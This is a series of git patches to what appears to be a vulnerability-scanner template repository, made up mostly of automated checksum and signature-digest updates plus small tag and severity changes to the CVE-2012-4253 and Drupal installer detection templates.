@@ -8175,7 +8176,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:0bd557ae0e24c541eae22a598daa4f74b79cfd0f +templates-checksum.txt:5e70b10373bd2e373d9301a4b8dcb1c3b77889b1 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 2d38339db725bdb9c6035f8b2a6b7f9bd4111f7e Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Wed, 20 Mar 2024 17:44:52 +0000 Subject: [PATCH 38/53] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 52ff2ed46f..9f93d3bc1e 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -4,6 +4,7 @@ on: paths: - '.new-additions' - 'dns/soa-detect.yaml' + - 'dns/spf-record-detect.yaml' - 'dns/txt-service-detect.yaml' - 'file/keys/dependency/dependency-track.yaml' - 'file/keys/docker/dockerhub-pat.yaml' From a61b8cb7f77b5b87f62a7ea5552d6e92f8ff2079 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 20 Mar 2024 17:46:15 +0000 Subject: [PATCH 39/53] Auto Template Signing [Wed Mar 20 17:46:15 UTC 2024] :robot: --- dns/spf-record-detect.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/dns/spf-record-detect.yaml b/dns/spf-record-detect.yaml index c5583ab23a..7a9a051fd7 100644 --- a/dns/spf-record-detect.yaml +++ b/dns/spf-record-detect.yaml 
@@ -22,3 +22,4 @@ dns: - type: regex regex: - "v=spf1(.+)" +# digest: 4b0a00483046022100ada13ee531e36c1b45b196bafc39386d03ee223d98f9d0c3d3bd6f0609c6101202210099f776bb4a582a65c321385adc3d8fa9ec6f3047e658c38c6da98c89dd82c7c9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 603a75175f8e5ec5b0e62f06d5a1af95111c584d Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 20 Mar 2024 18:18:58 +0000 Subject: [PATCH 40/53] Auto Generated Templates Checksum [Wed Mar 20 18:18:58 UTC 2024] :robot: --- templates-checksum.txt | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index e2f8d3cfd0..6ba563c418 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -123,7 +123,7 @@ dns/nameserver-fingerprint.yaml:7a9247d4f45a9699418b4afed5cea0388b147735 dns/ptr-fingerprint.yaml:ecff55b058dba2ad98432eacea8b52ce1d8e7656 dns/servfail-refused-hosts.yaml:ee2505b5619921a20332494f2281664eaf01fa87 dns/soa-detect.yaml:5c758030190eea7fc6934a23dd266362ee2a355b -dns/spf-record-detect.yaml:d284769413067e7c7fdfa930502a15242a628703 +dns/spf-record-detect.yaml:6aad264acb43bab9f128417e59b116cb7b35868e dns/spoofable-spf-records-ptr.yaml:7cb8aa2d5fa1b19224a6ca0b17c5b46377892ee7 dns/txt-fingerprint.yaml:eca4bcdfb25f2922e233e4801f1beb27893f7e70 dns/txt-service-detect.yaml:c331256e50faf2211d80f1f973f42c748d86a5d1 
@@ -6431,7 +6431,7 @@ http/technologies/fanruanoa-detect.yaml:e7b2e01057d3be79d3ddbcc64b33f9af7a33bbb1 http/technologies/fanruanoa2012-detect.yaml:f9a6f78d0d2e34d49a10f73f592bd87169259bac http/technologies/fastjson-version.yaml:50f165d16a31d441a597695102e983ebbaa1857a http/technologies/favicon-detect.yaml:10cb70dd76719f7850249d0b9184054205fd47f5 -http/technologies/fingerprinthub-web-fingerprints.yaml:27e666a6c70080629b106d8a7549a69b04e80292 +http/technologies/fingerprinthub-web-fingerprints.yaml:395162bda66fdf4f6e2de47431c5200fe145dfa5 http/technologies/froxlor-detect.yaml:67aaf702a20981d17394938929f1835d6b48e6b2 http/technologies/geo-webserver-detect.yaml:53e3388afdaa4abc6d221db435f0c3ee78dfe3e9 http/technologies/geth-server-detect.yaml:caf614fcafdfca5f044916adf9dde2abb41b46a9 @@ -8176,7 +8176,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:5e70b10373bd2e373d9301a4b8dcb1c3b77889b1 +templates-checksum.txt:c39f1ef0b33169857d5d46a8397b6894d92ff8a4 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 50de72defbbbc03e31c92014bfb93d37c5b60b06 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 20 Mar 2024 18:20:56 +0000 Subject: [PATCH 41/53] Auto Template Signing [Wed Mar 20 18:20:56 UTC 2024] :robot: --- http/technologies/fingerprinthub-web-fingerprints.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/technologies/fingerprinthub-web-fingerprints.yaml b/http/technologies/fingerprinthub-web-fingerprints.yaml index afff283113..ca2ef4cc89 100755 --- a/http/technologies/fingerprinthub-web-fingerprints.yaml 
+++ b/http/technologies/fingerprinthub-web-fingerprints.yaml @@ -15065,4 +15065,4 @@ http: words: - "x-dispatcher:" case-insensitive: true -# digest: 4a0a00473045022100e202b5b8367df139a20f5ff3fced4c3ec57f5c5c98c2c42e3079952ccc4cf87502204d5331301337b21ea90535286f9393bc4140b0fde578aef1869201af8fca701e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100bc94744c796eb79eba218d1c041ec0e817654420bfc1a1c188d90dcfc8506dcc0221008763af93a66376ac9b4dbee14f6d8a1db56f84bfc29474faefd0f50ffd68ea6b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 994d44ecf799788482d8950df621e2eceffca47c Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 20 Mar 2024 19:19:36 +0000 Subject: [PATCH 43/53] Auto Generated Templates Checksum [Wed Mar 20 19:19:36 UTC 2024] :robot: --- templates-checksum.txt | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 6ba563c418..b1f3af28bf 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -6431,7 +6431,7 @@ http/technologies/fanruanoa-detect.yaml:e7b2e01057d3be79d3ddbcc64b33f9af7a33bbb1 http/technologies/fanruanoa2012-detect.yaml:f9a6f78d0d2e34d49a10f73f592bd87169259bac http/technologies/fastjson-version.yaml:50f165d16a31d441a597695102e983ebbaa1857a http/technologies/favicon-detect.yaml:10cb70dd76719f7850249d0b9184054205fd47f5 -http/technologies/fingerprinthub-web-fingerprints.yaml:395162bda66fdf4f6e2de47431c5200fe145dfa5 +http/technologies/fingerprinthub-web-fingerprints.yaml:4dbe54eb11797d8ee2acfbafbf269363102734bd http/technologies/froxlor-detect.yaml:67aaf702a20981d17394938929f1835d6b48e6b2 http/technologies/geo-webserver-detect.yaml:53e3388afdaa4abc6d221db435f0c3ee78dfe3e9 http/technologies/geth-server-detect.yaml:caf614fcafdfca5f044916adf9dde2abb41b46a9 
@@ -6537,7 +6537,7 @@ http/technologies/microsoft/aspnetmvc-version-disclosure.yaml:341d9ec2d4e676c7d0 http/technologies/microsoft/default-iis7-page.yaml:c4e22ee6e9c969c526ea2609a510a8e23150963d http/technologies/microsoft/default-microsoft-azure-page.yaml:edf6bd39671cbd1eeda217a1956965a66e368d06 http/technologies/microsoft/default-windows-server-page.yaml:eddc0c09081a8fdfdd579671ba67816b49e8bb81 -http/technologies/microsoft/microsoft-iis-version.yaml:879e7e413c5a14c9f8d60c781d1a2d6e14082a0c +http/technologies/microsoft/microsoft-iis-version.yaml:388eeed4e41d6681d1715a232292e33ee19e1ae3 http/technologies/microsoft/microsoft-sharepoint-detect.yaml:dabe925d2623a1e643cc36887c63daa6079a51d7 http/technologies/microsoft/ms-exchange-server.yaml:ac56edde8f4b9be40add08dffaa028504eeedd69 http/technologies/microsoft/sql-server-reporting.yaml:f09e2468fe44fbccafc12b034f080bee81f7c7e8 @@ -8176,7 +8176,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:c39f1ef0b33169857d5d46a8397b6894d92ff8a4 +templates-checksum.txt:30add9985a0dfd3be88361eb34dcd71c7d70f2c6 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 516ef9acd478f987368a317691e0a18d4dd3b1c4 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 20 Mar 2024 19:21:17 +0000 Subject: [PATCH 44/53] Auto Template Signing [Wed Mar 20 19:21:17 UTC 2024] :robot: --- http/technologies/microsoft/microsoft-iis-version.yaml | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) 
diff --git a/http/technologies/microsoft/microsoft-iis-version.yaml b/http/technologies/microsoft/microsoft-iis-version.yaml index ac03e25967..d85e1c2ad9 100644 --- a/http/technologies/microsoft/microsoft-iis-version.yaml +++ b/http/technologies/microsoft/microsoft-iis-version.yaml @@ -29,5 +29,4 @@ http: part: header kval: - Server - -# digest: 490a0046304402204aec8d1c4678a40a8ca831d952b351c4ca885fb845222a559099426e6a27ba9602204f9487670472a494fcecc37f1ebc08e68f6c3007de6fae438c5f5b7210e66a87:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502207a63b4fb5117f7f1168ba477b97deaa35e7e38c9355639a7df7c8f6f54fa960c022100e3d3f3c25ecff01f75a723ca2df3e64e5ea725d7cc61f70ef54e41f6899fc359:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 02c060a8e43fdcd8dfd34b0cf7369559fe3b900b Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E6=88=91=E4=BC=9A=E5=95=8AD=2C=E6=98=8E=E5=B0=8F=E5=AD=90?= =?UTF-8?q?=2C=E5=BE=A1=E5=89=91?= <104293903+pwnhxl@users.noreply.github.com> Date: Thu, 21 Mar 2024 08:29:27 +0800 Subject: [PATCH 45/53] fix tag CVE-2012-4253.yaml --- http/cves/2012/CVE-2012-4253.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/http/cves/2012/CVE-2012-4253.yaml b/http/cves/2012/CVE-2012-4253.yaml index cc95c455b2..046f3fb2ab 100644 --- a/http/cves/2012/CVE-2012-4253.yaml +++ b/http/cves/2012/CVE-2012-4253.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: mysqldumper product: mysqldumper - tags: cve2012,cve,packetstorm,lfi,edb,mysqldumper,xss + tags: cve2012,cve,packetstorm,lfi,edb,mysqldumper http: - method: GET 
@@ -43,4 +43,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100eefa80b385734b0a1e6f33288900b62b779941de6560c529987c9593f998d354022100a78e22cf092547bdbd7693f37f2f5fe8f9d4858b98c6fcfc32c3cf37b6f96274:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100eefa80b385734b0a1e6f33288900b62b779941de6560c529987c9593f998d354022100a78e22cf092547bdbd7693f37f2f5fe8f9d4858b98c6fcfc32c3cf37b6f96274:922c64590222798bb761d5b6d8e72950 From a2b5863af447952626bd9d9282ec1c6780fc4724 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 21 Mar 2024 05:00:49 +0000 Subject: [PATCH 47/53] Auto Generated Templates Checksum [Thu Mar 21 05:00:49 UTC 2024] :robot: --- templates-checksum.txt | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index b1f3af28bf..07d57b29ee 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -976,7 +976,7 @@ http/cves/2012/CVE-2012-2371.yaml:c9b170834b0f6878fbd65a84289f9dde6cdf6edf http/cves/2012/CVE-2012-3153.yaml:9632dbed943428a3ce82bd26243e96bb53e0101f http/cves/2012/CVE-2012-4032.yaml:c433e79a48badc5d9996e22bcd1939ee98401e92 http/cves/2012/CVE-2012-4242.yaml:d4acd90297d0e2c72a092b7a02a3cd8d9b532923 -http/cves/2012/CVE-2012-4253.yaml:8191f7e69d1dbec2c0b9ea2f687eafa87eeb2214 +http/cves/2012/CVE-2012-4253.yaml:93bd7e8a7190482cf491b58ff39abf24dc655387 http/cves/2012/CVE-2012-4273.yaml:d7e6647482c7d87038483b2bc94a26745bb3c841 http/cves/2012/CVE-2012-4547.yaml:d254026e048515763754a600a75aab80318b79f5 http/cves/2012/CVE-2012-4768.yaml:61df87600a157bab6ca0ae1244cf87d5dbb36af7 
@@ -6537,7 +6537,7 @@ http/technologies/microsoft/aspnetmvc-version-disclosure.yaml:341d9ec2d4e676c7d0 http/technologies/microsoft/default-iis7-page.yaml:c4e22ee6e9c969c526ea2609a510a8e23150963d http/technologies/microsoft/default-microsoft-azure-page.yaml:edf6bd39671cbd1eeda217a1956965a66e368d06 http/technologies/microsoft/default-windows-server-page.yaml:eddc0c09081a8fdfdd579671ba67816b49e8bb81 -http/technologies/microsoft/microsoft-iis-version.yaml:388eeed4e41d6681d1715a232292e33ee19e1ae3 +http/technologies/microsoft/microsoft-iis-version.yaml:dcf1fea08a8e195fb4fb800bddc0355619141c06 http/technologies/microsoft/microsoft-sharepoint-detect.yaml:dabe925d2623a1e643cc36887c63daa6079a51d7 http/technologies/microsoft/ms-exchange-server.yaml:ac56edde8f4b9be40add08dffaa028504eeedd69 http/technologies/microsoft/sql-server-reporting.yaml:f09e2468fe44fbccafc12b034f080bee81f7c7e8 @@ -8176,7 +8176,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:30add9985a0dfd3be88361eb34dcd71c7d70f2c6 +templates-checksum.txt:05e0c517f0d08f9334bb67bf6c18a1ccafde36eb wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From cf8cd4f27a74fa4712a830672ea5b888b88b17c1 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 21 Mar 2024 05:02:28 +0000 Subject: [PATCH 48/53] Auto Template Signing [Thu Mar 21 05:02:28 UTC 2024] :robot: --- http/cves/2012/CVE-2012-4253.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/cves/2012/CVE-2012-4253.yaml b/http/cves/2012/CVE-2012-4253.yaml index 046f3fb2ab..fbe3a390e6 100644 --- a/http/cves/2012/CVE-2012-4253.yaml 
+++ b/http/cves/2012/CVE-2012-4253.yaml @@ -43,4 +43,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100eefa80b385734b0a1e6f33288900b62b779941de6560c529987c9593f998d354022100a78e22cf092547bdbd7693f37f2f5fe8f9d4858b98c6fcfc32c3cf37b6f96274:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100de6cb5ae696eb8f0b8837ff02b5e53e8049e806e0253c9933027f7da28634071022100fc1518b608713661374a7f1ebd5ef01b8816925196928a73aa3882adf5bf8192:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From b1b540179aa297e2f3c9767d174d126eed204917 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Thu, 21 Mar 2024 13:08:19 +0530 Subject: [PATCH 49/53] Update drupal-install.yaml --- http/exposures/files/drupal-install.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/http/exposures/files/drupal-install.yaml b/http/exposures/files/drupal-install.yaml index 6bc4fa3159..bc154f9f53 100644 --- a/http/exposures/files/drupal-install.yaml +++ b/http/exposures/files/drupal-install.yaml @@ -3,7 +3,7 @@ id: drupal-install info: name: Drupal Install author: NkxxkN - severity: low + severity: critical description: Drupal Install panel exposed. metadata: max-request: 2 @@ -23,4 +23,4 @@ http: - type: word words: - "Choose language | Drupal" -# digest: 490a0046304402206f6f65e8aa3223ec1f67b0e97780b4bc7d9ddc28af4ba9562d4d52ae06946a82022037c67f1e4b8c5b8bac6369fb8a23830b76a97f8188317b70b7275c284b201b8c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402206f6f65e8aa3223ec1f67b0e97780b4bc7d9ddc28af4ba9562d4d52ae06946a82022037c67f1e4b8c5b8bac6369fb8a23830b76a97f8188317b70b7275c284b201b8c:922c64590222798bb761d5b6d8e72950 From 0cd4e5a335c7675189e58fd588aca060a6316af0 Mon Sep 17 00:00:00 2001 
From: Dhiyaneshwaran Date: Thu, 21 Mar 2024 13:11:35 +0530 Subject: [PATCH 50/53] Update and rename drupal-install.yaml to drupal-install.yaml --- .../files => misconfiguration/installer}/drupal-install.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) rename http/{exposures/files => misconfiguration/installer}/drupal-install.yaml (91%) diff --git a/http/exposures/files/drupal-install.yaml b/http/misconfiguration/installer/drupal-install.yaml similarity index 91% rename from http/exposures/files/drupal-install.yaml rename to http/misconfiguration/installer/drupal-install.yaml index bc154f9f53..282cedeb23 100644 --- a/http/exposures/files/drupal-install.yaml +++ b/http/misconfiguration/installer/drupal-install.yaml @@ -3,12 +3,12 @@ id: drupal-install info: name: Drupal Install author: NkxxkN - severity: critical + severity: high description: Drupal Install panel exposed. metadata: max-request: 2 shodan-query: http.component:"drupal" - tags: exposure,drupal + tags: misconfig,drupal,install,exposure http: - method: GET From 0638540f77d37de7b8b418b6e3247f18594fe62c Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 21 Mar 2024 07:45:49 +0000 Subject: [PATCH 52/53] Auto Generated Templates Checksum [Thu Mar 21 07:45:49 UTC 2024] :robot: --- templates-checksum.txt | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 07d57b29ee..1eb6877577 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt 
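Review bot: The severity is raised to high and the template moves under misconfiguration/installer, but `description: Drupal Install panel exposed.` gives a reader no basis for that rating. A one-line rationale in the description would let operators triage the finding without opening the template, for example `description: Drupal installation wizard is reachable without authentication, which indicates an unfinished or re-installable site; setup pages should not be exposed.` (the "reachable" part follows from the "Choose language | Drupal" matcher, the rest is the presumed reason for the rating and should be confirmed by the author). The `http` block continues past the hunk.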
@@ -976,7 +976,7 @@ http/cves/2012/CVE-2012-2371.yaml:c9b170834b0f6878fbd65a84289f9dde6cdf6edf http/cves/2012/CVE-2012-3153.yaml:9632dbed943428a3ce82bd26243e96bb53e0101f http/cves/2012/CVE-2012-4032.yaml:c433e79a48badc5d9996e22bcd1939ee98401e92 http/cves/2012/CVE-2012-4242.yaml:d4acd90297d0e2c72a092b7a02a3cd8d9b532923 -http/cves/2012/CVE-2012-4253.yaml:93bd7e8a7190482cf491b58ff39abf24dc655387 +http/cves/2012/CVE-2012-4253.yaml:22bb780ede0f6ee252aa15a98a2b1c8d437494e4 http/cves/2012/CVE-2012-4273.yaml:d7e6647482c7d87038483b2bc94a26745bb3c841 http/cves/2012/CVE-2012-4547.yaml:d254026e048515763754a600a75aab80318b79f5 http/cves/2012/CVE-2012-4768.yaml:61df87600a157bab6ca0ae1244cf87d5dbb36af7 @@ -4528,7 +4528,6 @@ http/exposures/files/desktop-ini-exposure.yaml:e1f2848de5e29a1d1f0069c15a5451d38 http/exposures/files/django-secret-key.yaml:9a9152c6627c7d1bb85923caedf61303f26e78b9 http/exposures/files/docker-cloud.yaml:1cd831e6d009b49e120b14206b7a19b825fd5272 http/exposures/files/domcfg-page.yaml:28b2f74eed60f6bf047db658ffcf8ccbacfb90a4 -http/exposures/files/drupal-install.yaml:becf211637e4dbbe6b1f0fa018d53f4ea23de648 http/exposures/files/ds-store-file.yaml:679fb351af4567e417c0697f8d3298ddc14767b4 http/exposures/files/dwsync-exposure.yaml:811dc04f9ef973b6d48e8b007590508b61230b4b http/exposures/files/environment-rb.yaml:cfd936dc5174ec7eee345830477ad8ee013d5eb4 
@@ -5134,6 +5133,7 @@ http/misconfiguration/installer/discourse-installer.yaml:cf9bf85966145a193efedf3 http/misconfiguration/installer/dokuwiki-installer.yaml:a572ea8dd4751008cd46b4319fe478d147173ac7 http/misconfiguration/installer/dolibarr-installer.yaml:6c971d39c8f61247ee422817192d8d1af5918a3f http/misconfiguration/installer/dolphin-installer.yaml:66ccbdc0d810c8fb5876d46e8c7780da1efd6057 +http/misconfiguration/installer/drupal-install.yaml:8935c0e57b3677226b50338b8495600390d3e8b0 http/misconfiguration/installer/easyscripts-installer.yaml:4cb8db53f08ed1bf8172866766c33878f579fda9 http/misconfiguration/installer/eshop-installer.yaml:c83244265e0cd9499cee6ecfd6fda805b6475251 http/misconfiguration/installer/espeasy-installer.yaml:051a8d1869f34a42c6d6a287ff2668c3b07c2b99 @@ -8176,7 +8176,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:05e0c517f0d08f9334bb67bf6c18a1ccafde36eb +templates-checksum.txt:128d6f230562518d7dd61144f475986ae8d2e63c wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 9b16d8e79707b4f706c7c4369912e55cd7615fc7 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 21 Mar 2024 07:47:25 +0000 Subject: [PATCH 53/53] Auto Template Signing [Thu Mar 21 07:47:25 UTC 2024] :robot: --- http/misconfiguration/installer/drupal-install.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/misconfiguration/installer/drupal-install.yaml b/http/misconfiguration/installer/drupal-install.yaml index 282cedeb23..734fee7e5b 100644 --- a/http/misconfiguration/installer/drupal-install.yaml 
+++ b/http/misconfiguration/installer/drupal-install.yaml @@ -23,4 +23,4 @@ http: - type: word words: - "Choose language | Drupal" -# digest: 490a0046304402206f6f65e8aa3223ec1f67b0e97780b4bc7d9ddc28af4ba9562d4d52ae06946a82022037c67f1e4b8c5b8bac6369fb8a23830b76a97f8188317b70b7275c284b201b8c:922c64590222798bb761d5b6d8e72950 +# digest: 490a004630440220115cf9e237a9e0e09034a814da536ec254ae826df2023819714ad7677814606102207ecda93edc69d914ee07bed7be0c76fcae80cd410e6a511552cd3686c8e6e785:922c64590222798bb761d5b6d8e72950 \ No newline at end of file
